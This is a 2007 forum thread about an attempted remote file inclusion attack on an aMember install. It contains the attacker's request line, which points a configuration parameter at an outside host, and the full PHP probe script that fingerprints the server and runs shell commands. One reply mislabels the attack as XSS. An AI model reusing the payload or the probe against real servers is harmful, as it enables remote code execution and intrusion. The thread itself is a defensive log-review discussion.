amember attack

Discussion in 'Troubleshooting' started by tomarriola, Oct 1, 2007.

  1. tomarriola

    tomarriola Member

    Joined:
    Mar 29, 2003
    Messages:
    140
    I have a bunch of lines like this in my logs

    killergismo.com - - [01/Oct/2007:00:03:19 -0700] "GET /amember//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 403 1042 "-" "libwww-perl/5.803"

    Luckily my amember install isn't in a directory named amember or they'd have got me.

    Here is the text from the file at http://usuarios.arnet.com.ar/larry123/safe.txt

    <?
    $dir = @getcwd();
    $ker = @php_uname();
    echo "31337<br>";
    $OS = @PHP_OS;
    echo "<br>OSTYPE:$OS<br>";
    echo "<br>Kernel:$ker<br>";
    $free = disk_free_space($dir);
    if ($free === FALSE) {$free = 0;}
    if ($free < 0) {$free = 0;}
    echo "Free:".view_size($free)."<br>";
    $cmd="id";
    $eseguicmd=ex($cmd);
    echo $eseguicmd;
    function ex($cfe){
    $res = '';
    if (!empty($cfe)){
    if(function_exists('exec')){
    @exec($cfe,$res);
    $res = join("\n",$res);
    }
    elseif(function_exists('shell_exec')){
    $res = @shell_exec($cfe);
    }
    elseif(function_exists('system')){
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(function_exists('passthru')){
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe,"r"))){
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    }}
    return $res;
    }
    function view_size($size)
    {
    if (!is_numeric($size)) {return FALSE;}
    else
    {
    if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
    elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
    elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
    else {$size = $size . " B";}
    return $size;
    }
    }

    ?>


    Tom
  2. jenolan

    jenolan aMember Coder

    Joined:
    Nov 3, 2006
    Messages:
    510
    You can not run that file directly from the web it will return "Direct access to this location is not allowed"

    Same if you run the command he is trying to insert, this is called an xss attack which aMember, in this case anyway, is not vulnerable.
  3. alexander

    alexander Administrator Staff Member

    Joined:
    Jan 8, 2003
    Messages:
    6,279
    Also, that request generate 403 error as you can see:
    /amember//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 403 1042 "-" "libwww-perl/5.803"
    so it was forbidden by webserver.

Share This Page